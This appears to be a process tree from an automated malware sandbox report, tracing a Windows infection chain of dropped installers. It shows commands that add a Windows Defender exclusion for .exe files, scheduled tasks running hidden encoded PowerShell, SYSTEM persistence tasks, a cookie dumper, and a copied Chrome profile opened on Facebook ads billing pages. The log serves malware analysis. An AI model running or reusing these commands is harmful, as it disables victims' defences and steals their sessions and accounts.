C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1608,1329164455694045133,11970494685335120572,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3116 /prefetch:174⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1608,1329164455694045133,11970494685335120572,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3604 /prefetch:174⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1608,1329164455694045133,11970494685335120572,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=4572 /prefetch:874⤵
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kyvevbpw.hev\customer4.exe & exit71⤵
-
C:\Users\Admin\AppData\Local\Temp\kyvevbpw.hev\customer4.exeC:\Users\Admin\AppData\Local\Temp\kyvevbpw.hev\customer4.exe72⤵
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX1\main.exe"73⤵
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jyatyege.jdd\HookSetp.exe & exit71⤵
-
C:\Users\Admin\AppData\Local\Temp\jyatyege.jdd\HookSetp.exeC:\Users\Admin\AppData\Local\Temp\jyatyege.jdd\HookSetp.exe72⤵
-
C:\ProgramData\8050359.88"C:\ProgramData\8050359.88"73⤵
-
-
C:\ProgramData\6765460.74"C:\ProgramData\6765460.74"73⤵
- Suspicious behavior: SetClipboardViewer
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5tnxge4x.wcu\GcleanerWW.exe /mixone & exit71⤵
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\2ywwvue3.k3e\privacytools5.exe & exit71⤵
-
C:\Users\Admin\AppData\Local\Temp\2ywwvue3.k3e\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\2ywwvue3.k3e\privacytools5.exe72⤵
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\2ywwvue3.k3e\privacytools5.exeC:\Users\Admin\AppData\Local\Temp\2ywwvue3.k3e\privacytools5.exe73⤵
- Checks SCSI registry key(s)
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\11fit1uy.ys5\setup.exe /8-2222 & exit71⤵
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yni13zkl.vb1\MultitimerFour.exe & exit71⤵
-
C:\Users\Admin\AppData\Local\Temp\yni13zkl.vb1\MultitimerFour.exeC:\Users\Admin\AppData\Local\Temp\yni13zkl.vb1\MultitimerFour.exe72⤵
-
C:\Users\Admin\AppData\Local\Temp\YYL09XWJKS\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\YYL09XWJKS\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 10473⤵
- Drops file in Windows directory
-
C:\Users\Admin\AppData\Local\Temp\YYL09XWJKS\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\YYL09XWJKS\multitimer.exe" 1 3.1616085924.605383a473ca8 10474⤵
- Adds Run key to start application
-
C:\Users\Admin\AppData\Local\Temp\YYL09XWJKS\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\YYL09XWJKS\multitimer.exe" 2 3.1616085924.605383a473ca875⤵
- Maps connected drives based on registry
- Enumerates system info in registry
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\TKAOL330M7\setups.exe"C:\Users\Admin\AppData\Local\Temp\TKAOL330M7\setups.exe" ll73⤵
-
C:\Users\Admin\AppData\Local\Temp\is-2U3AL.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-2U3AL.tmp\setups.tmp" /SL5="$3054C,549376,61440,C:\Users\Admin\AppData\Local\Temp\TKAOL330M7\setups.exe" ll74⤵
- Checks computer location settings
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\b0souxy3.lqz\setup.exe /S /kr /site_id=754 & exit71⤵
-
C:\Users\Admin\AppData\Local\Temp\b0souxy3.lqz\setup.exeC:\Users\Admin\AppData\Local\Temp\b0souxy3.lqz\setup.exe /S /kr /site_id=75472⤵
- Checks BIOS information in registry
- Drops file in System32 directory
- Enumerates system info in registry
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"73⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&74⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:3275⤵
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:6475⤵
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gjRzfjkPk" /SC once /ST 10:19:13 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="73⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gjRzfjkPk"73⤵
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-E6KIN.tmp\hjjgaa.exe"C:\Users\Admin\AppData\Local\Temp\is-E6KIN.tmp\hjjgaa.exe" /Verysilent65⤵
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt66⤵
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt66⤵
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\bppy0xmihzj\31e5jfwbtzs.exe"C:\Users\Admin\AppData\Local\Temp\bppy0xmihzj\31e5jfwbtzs.exe" /ustwo INSTALL61⤵
-
-
C:\Users\Admin\AppData\Local\Temp\e4w4x1dx1ed\askinstall24.exe"C:\Users\Admin\AppData\Local\Temp\e4w4x1dx1ed\askinstall24.exe"61⤵
- Drops Chrome extension
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe62⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe63⤵
- Kills process with taskkill
-
-
-
C:\Windows\SysWOW64\xcopy.exexcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\" /s /e /y62⤵
- Enumerates system info in registry
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/62⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xe0,0xe4,0xe8,0xbc,0xec,0x7ffc43f36e00,0x7ffc43f36e10,0x7ffc43f36e2063⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1480,7382400851264462529,17916973028212131155,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1500 /prefetch:263⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1480,7382400851264462529,17916973028212131155,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=1780 /prefetch:863⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1480,7382400851264462529,17916973028212131155,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=2180 /prefetch:863⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1480,7382400851264462529,17916973028212131155,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2692 /prefetch:163⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1480,7382400851264462529,17916973028212131155,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2684 /prefetch:163⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1480,7382400851264462529,17916973028212131155,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3112 /prefetch:163⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1480,7382400851264462529,17916973028212131155,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:163⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1480,7382400851264462529,17916973028212131155,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3604 /prefetch:163⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1480,7382400851264462529,17916973028212131155,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2948 /prefetch:163⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1480,7382400851264462529,17916973028212131155,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=4688 /prefetch:863⤵
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1480,7382400851264462529,17916973028212131155,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=828 /prefetch:863⤵
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\CLXPLFDKOC\setups.exe"C:\Users\Admin\AppData\Local\Temp\CLXPLFDKOC\setups.exe" ll58⤵
-
C:\Users\Admin\AppData\Local\Temp\is-6ALDA.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-6ALDA.tmp\setups.tmp" /SL5="$6059C,549376,61440,C:\Users\Admin\AppData\Local\Temp\CLXPLFDKOC\setups.exe" ll59⤵
- Checks computer location settings
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\5mud3zxi.ler\setup.exe /S /kr /site_id=754 & exit56⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV157⤵
-
-
C:\Users\Admin\AppData\Local\Temp\5mud3zxi.ler\setup.exeC:\Users\Admin\AppData\Local\Temp\5mud3zxi.ler\setup.exe /S /kr /site_id=75457⤵
- Checks BIOS information in registry
- Drops file in System32 directory
- Enumerates system info in registry
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"58⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&59⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:3260⤵
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:6460⤵
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gueCPlTUO" /SC once /ST 06:55:12 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="58⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gueCPlTUO"58⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gueCPlTUO"58⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bWIRRaDZCpCYZHZEtf" /SC once /ST 16:41:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj\BvDcUbfWcHtFaGn\OiRQGqF.exe\" nh /site_id 754 /S" /V1 /F58⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-Q656S.tmp\hjjgaa.exe"C:\Users\Admin\AppData\Local\Temp\is-Q656S.tmp\hjjgaa.exe" /Verysilent50⤵
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt51⤵
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt51⤵
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\xcdmcwjiycl\rp03erkobpf.exe"C:\Users\Admin\AppData\Local\Temp\xcdmcwjiycl\rp03erkobpf.exe" /ustwo INSTALL46⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7924 -s 64847⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7924 -s 66047⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7924 -s 66447⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7924 -s 80847⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7924 -s 64447⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7924 -s 92847⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7924 -s 108447⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
-
-
C:\Users\Admin\AppData\Local\Temp\udeiard2gmp\AwesomePoolU1.exe"C:\Users\Admin\AppData\Local\Temp\udeiard2gmp\AwesomePoolU1.exe"46⤵
-
-
C:\Users\Admin\AppData\Local\Temp\z33sylcsphe\askinstall24.exe"C:\Users\Admin\AppData\Local\Temp\z33sylcsphe\askinstall24.exe"46⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe47⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe48⤵
- Kills process with taskkill
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\AO5DHPW6T0\setups.exe"C:\Users\Admin\AppData\Local\Temp\AO5DHPW6T0\setups.exe" ll43⤵
-
C:\Users\Admin\AppData\Local\Temp\is-8VPMB.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-8VPMB.tmp\setups.tmp" /SL5="$70502,549376,61440,C:\Users\Admin\AppData\Local\Temp\AO5DHPW6T0\setups.exe" ll44⤵
- Checks computer location settings
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\caglxgrt.jot\setup.exe /S /kr /site_id=754 & exit41⤵
-
C:\Users\Admin\AppData\Local\Temp\caglxgrt.jot\setup.exeC:\Users\Admin\AppData\Local\Temp\caglxgrt.jot\setup.exe /S /kr /site_id=75442⤵
- Checks BIOS information in registry
- Drops file in System32 directory
- Enumerates system info in registry
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"43⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&44⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:3245⤵
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:6445⤵
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gOsoSHmLP" /SC once /ST 06:31:28 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="43⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gOsoSHmLP"43⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gOsoSHmLP"43⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bWIRRaDZCpCYZHZEtf" /SC once /ST 16:39:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj\BvDcUbfWcHtFaGn\Ehlsplu.exe\" nh /site_id 754 /S" /V1 /F43⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-RHPP2.tmp\hjjgaa.exe"C:\Users\Admin\AppData\Local\Temp\is-RHPP2.tmp\hjjgaa.exe" /Verysilent35⤵
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt36⤵
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt36⤵
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\5f3t1uh14q5\ugk5iqmtyu1.exe"C:\Users\Admin\AppData\Local\Temp\5f3t1uh14q5\ugk5iqmtyu1.exe" /ustwo INSTALL31⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 10472 -s 64832⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 10472 -s 68432⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 10472 -s 76432⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 10472 -s 81232⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 10472 -s 88032⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 10472 -s 92832⤵
- Program crash
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 10472 -s 109232⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
-
-
-
C:\Users\Admin\AppData\Local\Temp\3fzaobzkxcl\askinstall24.exe"C:\Users\Admin\AppData\Local\Temp\3fzaobzkxcl\askinstall24.exe"31⤵
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe32⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe33⤵
- Kills process with taskkill
-
-
-
-
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qbu3sgke.555\setup.exe /S /kr /site_id=754 & exit26⤵
-
C:\Users\Admin\AppData\Local\Temp\qbu3sgke.555\setup.exeC:\Users\Admin\AppData\Local\Temp\qbu3sgke.555\setup.exe /S /kr /site_id=75427⤵
- Checks BIOS information in registry
- Drops file in System32 directory
- Enumerates system info in registry
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"28⤵
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&29⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:3230⤵
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:6430⤵
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gOHnIvVRd" /SC once /ST 11:13:26 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="28⤵
- Creates scheduled task(s)
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gOHnIvVRd"28⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gOHnIvVRd"28⤵
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bWIRRaDZCpCYZHZEtf" /SC once /ST 16:37:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\pHalBSNsGkNRysJIj\BvDcUbfWcHtFaGn\bRoENFo.exe\" nh /site_id 754 /S" /V1 /F28⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
-
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-Q81MB.tmp\hjjgaa.exe"C:\Users\Admin\AppData\Local\Temp\is-Q81MB.tmp\hjjgaa.exe" /Verysilent20⤵
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt21⤵
-
-
